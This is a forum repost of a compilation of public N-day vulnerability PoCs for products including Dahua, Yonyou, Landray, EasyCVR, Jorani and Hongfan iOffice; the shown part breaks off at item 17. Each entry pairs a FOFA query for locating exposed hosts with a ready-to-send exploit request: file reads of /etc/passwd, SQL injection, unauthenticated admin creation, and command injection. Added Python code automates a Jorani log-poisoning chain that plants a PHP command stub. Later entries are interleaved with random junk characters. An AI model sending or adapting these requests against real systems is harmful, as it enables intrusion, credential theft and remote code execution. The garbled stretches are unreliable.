中国网络渗透测试联盟 (China Network Penetration Testing Alliance)

Title: Compilation of publicly disclosed Internet vulnerabilities, 2023-09 to 2024-06 (repost)

Author: admin    Posted: 2024-6-5 14:31

Compilation of publicly disclosed Internet vulnerabilities, 2023-09 to 2024-06
道一安全 2024-06-05 07:41 Beijing
The following article is reproduced from 网络安全新视界; author: 网络安全新视界.

Purpose: exploitation of N-day vulnerabilities accounts for a large share of real-world attacks. This article is intended to help defenders; defensive teams can use its contents to check their own exposure.

Sources: the article covers 203 PoCs for high-impact vulnerabilities disclosed in China and abroad between September 2023 and May 2024. All of them come from other public accounts or websites and were compiled and published by the 网络安全新视界 team.

Patches: all of the vulnerabilities are public. For patches or remediation guidance, contact the product vendor.

Content: because of length limits, a few PoCs that are too long have their payload replaced with the word PAYLOAD; search for the full PoC yourself if you need it.

Rights: if any of this content infringes someone's legitimate rights, contact the 网络安全新视界 team through the account backend and the relevant content will be removed.

Statement

To keep things simple and easy to browse, there is no "reply to get the full list" gate. This article is the complete version; search the page for keywords (F12) when using it.

Bookmark this article if you find it useful. You can also follow the public account (网络安全新视界).

Contents

1. StarRocks MPP database unauthorized access
2. Casdoor static arbitrary file read
3. EasyCVR intelligent edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. Sangfor NGAF arbitrary file read
7. Hongyun (鸿运) active safety monitoring cloud platform arbitrary file download
8. Phicomm router RCE
9. DocCMS (稻壳CMS) keyword unauthenticated SQL injection
10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. Hongfan (红帆) iOffice ioFileDown arbitrary file read
14. Huaxia ERP (jshERP) sensitive information disclosure
15. Huaxia ERP getAllList information disclosure
16. Hongfan HFOffice (医微云) SQL injection
17. Dahua DSS itcBulletin SQL injection
18. Dahua DSS digital surveillance system user_edit.action information disclosure
19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. Dahua ICC intelligent IoT management platform arbitrary file read
21. Dahua ICC intelligent IoT management platform random remote code execution
22. Dahua ICC intelligent IoT management platform log4j remote code execution
23. Dahua ICC intelligent IoT management platform fastjson remote code execution
24. Yonyou NC 6.5 accept.jsp arbitrary file upload
25. Yonyou NC registerServlet JNDI remote code execution
26. Yonyou NC linkVoucher SQL injection
27. Yonyou NC showcontent SQL injection
28. Yonyou NC grouptemplet arbitrary file upload
29. Yonyou NC down/bill SQL injection
30. Yonyou NC importPml SQL injection
31. Yonyou NC runStateServlet SQL injection
32. Yonyou NC complainbilldetail SQL injection
33. Yonyou NC downTax/download SQL injection
34. Yonyou NC warningDetailInfo interface SQL injection
35. Yonyou NC-Cloud importhttpscer arbitrary file upload
36. Yonyou NC-Cloud soapFormat XXE
37. Yonyou NC-Cloud IUpdateService XXE
38. Yonyou U8 Cloud smartweb2.RPC.d XXE
39. Yonyou U8 Cloud RegisterServlet SQL injection
40. Yonyou U8-Cloud XChangeServlet XXE
41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
42. Yonyou GRP-U8 SmartUpload01 file upload
43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
45. Yonyou GRP-U8 ufgovbank XXE
46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
48. Yonyou U8 CRM swfupload arbitrary file upload
49. Yonyou U8 CRM uploadfile.php arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. Yunshikong (云时空) social commerce ERP validateLoginName SQL injection
52. Weaver E-Office json_common.php SQL injection
53. DPtech VPN Service arbitrary file upload
54. Chanjet T+ getstorewarehousebystore remote code execution
55. Chanjet T+ getdecallusers information disclosure
56. Chanjet T+ RRATableController, Ufida.T.DI.UIP.ashx deserialization RCE
57. Chanjet T+ keyEdit.aspx SQL injection
58. Chanjet T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. Baizhuo (百卓) Smart management platform importexport.php SQL injection
61. Zheda Enter (浙大恩特) customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. Jiecheng (捷诚) management information system CWSFinanceCommon SQL injection
65. Youkate (优卡特) 脸爱云 face-recognition smart management platform 1.0.55.0.0.1 authorization bypass
66. Wanhu ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. Wanhu ezOFFICE wpsservlet arbitrary file upload
68. Wanhu ezOFFICE wf_printnum.jsp SQL injection
69. Wanhu ezOFFICE contract_gd.jsp SQL injection
70. Wanhu ezEIP success command execution
71. Bangyong (邦永) PM2 project management system Global_UserLogin.aspx SQL injection
72. Seeyon OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. Seeyon M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. Newcapec (新开普) campus service management platform service.action remote command execution
77. F22 garment management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE (百为) flow-control router remote command execution
80. Suda Tianyao (速达天耀) DesignReportSave.jsp arbitrary file upload
81. Uniview (宇视) video surveillance main-cgi password disclosure
82. Sifudi (思福迪) LOGBASE O&M security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Tosei (Japan) self-service laundry machine RCE
87. DBAppSecurity (安恒) Mingyu security gateway aaa_local_web_preview file upload
88. DBAppSecurity (安恒) Mingyu security gateway aaa_portal_auth_config_reset remote command execution
89. Seeyon FE collaborative office platform editflow_manager SQL injection
90. Hikvision IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. Hikvision operations management center session command execution
93. Qi An Xin (奇安信) Wangshen SecGate 3600 firewall app_av_import_save arbitrary file upload
94. Qi An Xin (奇安信) Wangshen SecGate 3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast (盈可视) HD intelligent recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated admin creation
111. WordPress plugin HTML5 Video Player SQL injection
112. WordPress plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. Beijing Baichuo (百绰) Smart S210 management platform uploadfile.php arbitrary file upload
119. Beijing Baichuo (百绰) Smart S20 sysmanageajax.php SQL injection
120. Beijing Baichuo (百绰) Smart S40 management platform import web.php arbitrary file upload
121. Beijing Baichuo (百绰) Smart S42 management platform userattestation.php arbitrary file upload
122. Beijing Baichuo (百绰) Smart S200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. Hunan Jianyan (湖南建研) construction quality testing system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. aiohttp path traversal
127. Glodon (广联达) Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 cloud mall (H5 云商城) file.php file upload
134. Netentsec (网康) NS-ASG application security gateway index.php SQL injection
135. Netentsec (网康) NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. Fujian Kelixun (科立迅) communication command and dispatch platform down_file.php SQL injection
138. Fujian Kelixun (科立讯) communication command and dispatch platform pwd_update.php SQL injection
139. Fujian Kelixun (科立讯) communication command and dispatch platform editemedia.php SQL injection
140. Fujian Kelixun (科立讯) communication command and dispatch platform get_extension_yl.php SQL injection
141. Kelixun (科立讯) communication command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v4.9.4 path traversal
148. CrushFTP authentication bypass and template injection
149. AJ-Report open-source dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. Gradio arbitrary file read
154. Tianweier (天维尔) fire rescue dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. Meite (美特) CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. Infinitt (英飞达) medical PACS WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. Keytop (科拓) smart parking fee system Webservice.asmx arbitrary file upload
162. Hefeng (和丰) multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. Huixiaoyuan (慧校园/安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. Zhongcheng Kexin (中成科信) ticketing management platform SeatMapHandler SQL injection
167. Jingyi (精益) value management system DownLoad.aspx arbitrary file read
168. Hongjing (宏景) EHR OutputCode arbitrary file read
169. Hongjing (宏景) EHR downlawbase SQL injection
170. Hongjing (宏景) EHR DisplayExcelCustomReport arbitrary file read
171. Tongtianxing (通天星) CMSV6 vehicle tracking platform SQL injection
172. DT HD license plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. Jinher (金和) OA C6 FileDownLoad.aspx arbitrary file read
175. Jinher (金和) OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. Jianwen (建文) engineering management system arbitrary file read
180. Bangguanke (帮管客) CRM jiliyu SQL injection
181. Runshen (润申) enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. Runshen (润申) enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. Guangzhou Tuchuang (图创) library cluster management system updOpuserPw SQL injection
184. Xunrao (迅饶) X2Modbus gateway AddUser arbitrary user creation
185. Ruiyou (瑞友) Tianyi application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. Santi (叁体) Jiahui video conferencing attachment arbitrary file read
189. Lanwang (蓝网科技) clinical viewer system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. Esafenet (亿赛通) electronic document security management system NavigationAjax SQL injection
192. Futong Tianxia (富通天下) foreign trade ERP UploadEmailAttr arbitrary file upload
193. Hillstone (山石网科) Yunjian security management system setsystemtimeaction command execution
194. FE (飞企互联) enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. Feiyuxing (飞鱼星) internet behavior management system send_order.cgi command execution
196. Henan Fengsu (风速科技) unified authentication platform password reset
197. Zheda Enter (浙大恩特) customer resource management system Quotegask_editAction SQL injection
198. Aliyun Drive (阿里云盘) WebDAV command injection
199. Cockpit assetsmanager_upload interface file upload
200. SeaCMS dmku SQL injection
201. Founder (方正) all-media news editing system binary SQL injection
202. WeEngine (微擎) AccountEdit arbitrary file upload
203. Honghaiyun (红海云) EHR PtFjk file upload

POC list

1. StarRocks MPP database unauthorized access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL


2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


3. EasyCVR intelligent edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx


4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"

Set password to the MD5 hash of the password you want to assign to the new account.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1


5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx


6. Sangfor NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:


7. Hongyun (鸿运) active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:


8. Phicomm router RCE
FOFA: icon_hash="-1344736688"
Log in to the admin UI with the default account admin first, then send the request below (the stok= token in the path and the sysauth cookie are those of your own login session; the command is injected through the Wi-Fi reboot schedule field, and the %s values are as given in the original PoC).
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained from the login step>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--


9. DocCMS (稻壳CMS) keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
Host: x.x.x.x

The payload is the double URL encoding of the statement below (the leading 1 is the ordinary search keyword the injection is appended to). It is an error-based injection: extractvalue() raises a MySQL XPath error whose message echoes the result of user() between the two ~ characters.

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

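The encoding step behind the keyword= value above, as an added example (not part of the original write-up or of any DocCMS code). It reproduces the %25%32%37... form from the plain statement and, for the defensive side, recovers the statement from a logged value and flags values that only reveal SQL injection after a second decode. The statement and payload constants are copied from the request above; the marker list in SQLI_MARKERS is my own choice.

```python
import re
from urllib.parse import unquote

# Taken from the request above: the plain statement and the final keyword value.
# The leading "1" is the ordinary search term the injection is appended to.
STATEMENT = "' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#"
PAYLOAD = (
    "1"
    "%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30"
    "%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34"
    "%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63"
    "%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38"
    "%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38"
    "%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30"
    "%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63"
    "%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33"
)


def url_encode_all(s: str) -> str:
    """Percent-encode every byte, alphanumerics included, with lowercase hex.

    A normal encoder leaves [A-Za-z0-9] alone; the payload on this page encodes
    everything, which is what keeps words like 'select' out of sight of a filter
    that decodes the parameter only once.
    """
    return "".join(f"%{b:02x}" for b in s.encode("utf-8"))


def double_url_encode(s: str) -> str:
    """Apply the full encoding twice (the form used in the keyword= value)."""
    return url_encode_all(url_encode_all(s))


def double_url_decode(s: str) -> str:
    """Strip two layers of percent-encoding. unquote() tolerates stray '%',
    so this is safe to run over arbitrary values pulled from access logs."""
    return unquote(unquote(s))


# Markers for the error- and time-based techniques that recur in this list
# (my own selection, not from the original article).
SQLI_MARKERS = re.compile(
    r"extractvalue\(|updatexml\(|\bselect\b|\bunion\b|sleep\(|waitfor\b", re.I
)


def flag_double_encoded_sqli(value: str) -> bool:
    """True when a value shows SQL injection only after a second decode,
    i.e. it would slip past a filter (or a log search) that decodes once."""
    once = unquote(value)
    twice = unquote(once)
    if once == twice:            # nothing hidden behind a second layer
        return False
    return bool(SQLI_MARKERS.search(twice)) and not SQLI_MARKERS.search(once)
```

Running flag_double_encoded_sqli over the query strings in a web-server access log picks out this payload while leaving plain and singly-encoded values to the usual signature matching; decode with double_url_decode before handing a value to a detection rule, since a rule that decodes once sees only %27%20%61... and matches nothing.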
10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"

After the upload, the response contains the path of the stored file.
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--


11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
Error-based: comparing the integer 1 with @@version makes SQL Server fail the implicit conversion, and the error message returned by the page contains the version string.
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close


12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step 1: obtain the cookies.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value in the response is used in the following requests (it must also be sent as csrf_test_jorani in the form body, otherwise the CSRF check rejects the login attempt).
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

Step 2: POST a login attempt whose login field is a PHP stub that executes a base64-decoded command taken from the K1SYJPMHLU4Z request header. The failed login (including the stub) is written to the application log, and the path traversal in language= points the language loader at application/logs.
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPassword


Step 3: send the following request to the target to execute id. The header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64 encoding of the command echo ---------;id 2>&1;echo ---------; and the page name log-2023-10-24 is the log file for the day the poisoning request was sent.
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip


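The three-step chain above written out as code, as an added example that is not part of the original post and not the exploit author's script. It only builds the step 2 body and the step 3 request (no network I/O), so the values can be checked against the ones on the page; the host, cookie values, header name and log date are the ones shown above and are assumptions here, and the log file name follows CodeIgniter's log-YYYY-MM-DD convention.

```python
import base64
from urllib.parse import quote

# Values copied from the requests above. The header name is arbitrary (it only
# has to match the stub); the host and log date are those of the test target
# and the day the poisoning request is sent.
HEADER_NAME = "K1SYJPMHLU4Z"
HOST = "192.168.190.30"


def php_stub(header_name: str) -> str:
    """PHP one-liner that runs a base64-decoded command taken from a request
    header. PHP exposes a header Foo-Bar as $_SERVER['HTTP_FOO_BAR']."""
    key = "HTTP_" + header_name.upper().replace("-", "_")
    return ("<?php if(isset($_SERVER['%s']))"
            "{system(base64_decode($_SERVER['%s']));} ?>" % (key, key))


def build_poison_body(csrf_token: str, header_name: str = HEADER_NAME) -> str:
    """Form body for step 2 (POST /session/login).

    csrf_test_jorani must repeat the csrf_cookie_jorani value from step 1
    (double-submit CSRF check). The failed login is recorded in the
    application log together with the stub carried in `login`, and the
    traversal in `language` points the language loader at application/logs
    so that a later page view includes that log file."""
    return (
        f"csrf_test_jorani={csrf_token}"
        f"&last_page={quote('session/login', safe='')}"
        f"&language={quote('../../application/logs', safe='')}"
        f"&login={php_stub(header_name)}"
        "&CipheredValue=DummyPassword"
    )


def encode_command(cmd: str) -> str:
    """Base64 keeps shell metacharacters and spaces out of the header value."""
    return base64.b64encode(cmd.encode()).decode()


def build_trigger_request(csrf_token: str, session_id: str, log_date: str,
                          cmd: str, host: str = HOST,
                          header_name: str = HEADER_NAME) -> str:
    """Raw GET for step 3: viewing log-YYYY-MM-DD includes the poisoned log,
    and the stub executes whatever the header carries."""
    lines = [
        f"GET /pages/view/log-{log_date} HTTP/1.1",
        f"Host: {host}",
        f"Cookie: csrf_cookie_jorani={csrf_token}; jorani_session={session_id}",
        f"{header_name}: {encode_command(cmd)}",
        "X-REQUESTED-WITH: XMLHttpRequest",
        "Connection: close",
    ]
    return "\r\n".join(lines) + "\r\n\r\n"
```

The body produced by build_poison_body is byte-for-byte the one on the page (252 bytes, matching the Content-Length header above), which is a quick way to confirm a reproduction before pointing it at a test instance. On the defensive side the same three strings are the detection: a `language=` parameter containing `../`, `<?php` inside a login field, and a request for `/pages/view/log-` followed by a date.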
; R* a: w4 H* |) H13. 红帆iOffice ioFileDown任意文件读取
0 \6 {5 Q# U+ e8 y) P1 wFOFA:app="红帆-ioffice"4 {9 w* C/ C. N3 q* Z1 V/ o! r
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
; T" |6 R5 m; t3 L3 ?/ \Host: x.x.x.x
5 b( b6 d! s4 g; A4 o. }: UUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.367 v2 o& j4 r7 o2 r. L
Connection: close6 o  h# z6 x0 k* N
Accept: */*
& y' R" N  V5 V) FAccept-Encoding: gzip1 Q* q" `9 {" y7 [5 |

- a) r' y/ C& j  @; e; G, L" e# z; c( y" M! v4 E# T& w. K! e
14. 华夏ERP(jshERP)敏感信息泄露
  z* B6 ]& ^7 Y4 E+ \: \FOFA:body="jshERP-boot"
. P+ V/ {" r' u( y: ^泄露内容包括用户名密码
& M4 V9 P; `1 O8 |GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
! H* m3 P# ?9 ^7 P& T% X1 H/ b6 H1 jHost: x.x.x.x8 `0 H# Y' u0 p1 n4 I
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
  ?/ f. v0 B2 r* |5 U, E$ XConnection: close- G: L5 S. p, W% i' O* K
Accept: */*4 I& U: A. s" f- F0 q
Accept-Language: en
( B0 |8 K9 ^8 I* |/ {Accept-Encoding: gzip
( t, o; h( P0 y5 C
: \; U2 v& ~9 B0 m- x, _' d
. b3 \2 g; }* n1 ?15. 华夏ERP getAllList信息泄露
( i! {, q+ y0 S4 w; {) Q' k# u3 VCVE-2024-0490
$ W; u* u2 L( i8 j* @, Q0 [/ YFOFA:body="jshERP-boot"% p, h+ r6 }6 ^; E8 {% |8 ]
泄露内容包括用户名密码
" l% C" ~7 p" g% X# i2 h0 jGET /jshERP-boot/user/a.ico/../getAllList HTTP/1.13 R: F5 v6 J4 {/ O
Host: 192.168.40.130:100
# c9 ~% Y: z8 @$ g) g' Z* MUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
" V3 q* ?( i) L+ g& rConnection: close& v# _. w% C9 X
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
" A+ U' H( M; c$ Z% ]7 _% |+ E# UAccept-Language: en. P: |/ c$ n7 c/ n
sec-ch-ua-platform: Windows& c" F' a$ M# m. L
Accept-Encoding: gzip. I9 r1 F- r  |3 b. t+ _9 c

0 S9 M, o3 C5 \9 P/ X4 K8 ~! w4 s: S/ t& W! O  h# z
16.  红帆HFOffice医微云SQL注入- d; D& _: \+ m" P& Z$ X
FOFA:title="HFOffice"" [. L9 d6 X7 d* S1 h! v! U0 P
poc中调用函数计算1234的md5值
  d# f, O) t) y3 nGET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
+ I6 A' Z" k3 E9 q5 o2 e" m+ ?4 |Host: x.x.x.x  L# W3 k1 B8 j
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.366 U; |. p- h, m& a
Connection: close
  ~! B+ T% w8 M. l5 ]+ oAccept: */*# \2 d3 T/ z3 p5 e' e
Accept-Language: en
) V4 G9 w8 x( K9 I" T. mAccept-Encoding: gzip$ V! a$ `) h* L" g, w9 q
' f  _6 R% l1 R) O2 X3 l0 @
! y& L* W5 F2 Q' \7 Q+ O* }: A
17. 大华 DSS itcBulletin SQL 注入+ h8 e+ H: U7 h3 ?! @2 I  a0 e
FOFA:app="dahua-DSS"
